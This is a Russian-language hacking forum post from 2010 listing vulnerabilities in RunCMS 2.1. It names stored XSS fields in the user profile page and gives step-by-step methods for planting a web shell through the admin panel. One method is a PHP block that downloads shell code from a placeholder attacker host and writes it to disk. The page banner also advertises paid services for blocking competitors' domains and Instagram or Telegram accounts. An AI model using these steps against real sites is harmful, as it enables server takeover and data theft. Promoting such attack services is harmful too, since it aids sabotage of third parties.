[ Обзор уязвимостей RunCMS ] — ANTICHAT Forum

FORUMS

MEMBERS

RECENT POSTS

LOG IN

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

loading...

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей RunCMS ]

Опции темы

Поиск в этой теме

Опции просмотра

Предыдущая

Предыдущее сообщение

Следующее сообщение

Следующая

#32

Старый

08.04.2010, 14:39

Аватар для Player#1

Player#1

Познающий

Регистрация: 11.11.2008

Сообщений: 77

С нами: 9208644

Репутация: 99

По умолчанию

RunCMS 2.1

Active XSS
http://yoursite/edituser.php

Поле address varchar(150)

Поле town varchar(60)

Заливка шелла через админку
http://yoursite/modules/system/admin.php?fct=tpleditor
Заливаем zip архив с шеллом.
Шелл будет залит сюда: http://yoursite/themes/shell.php

---------------------------------------------------------
http://yoursite/modules/system/admin.php?fct=blocksadmin
Добавляем новый блок:
Content - сюда вставляем инклюд шелла, например:

PHP код:


		
			
$str = file_get_contents("http://hacker-site/shell.txt");

$fp = fopen("shell.php", "w+t");

fwrite($fp, $str);

Content Type - PHP Script
Заходим на страницу содержащую блок или смотрим его preview.
Шелл будет залит сюда: http://yoursite/modules/system/shell.php

Player#1 (c)

Ответить с цитированием

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей в форумных движках]	Grey	Уязвимости CMS / форумов	49	02.04.2015 17:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Terms and Rules

ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.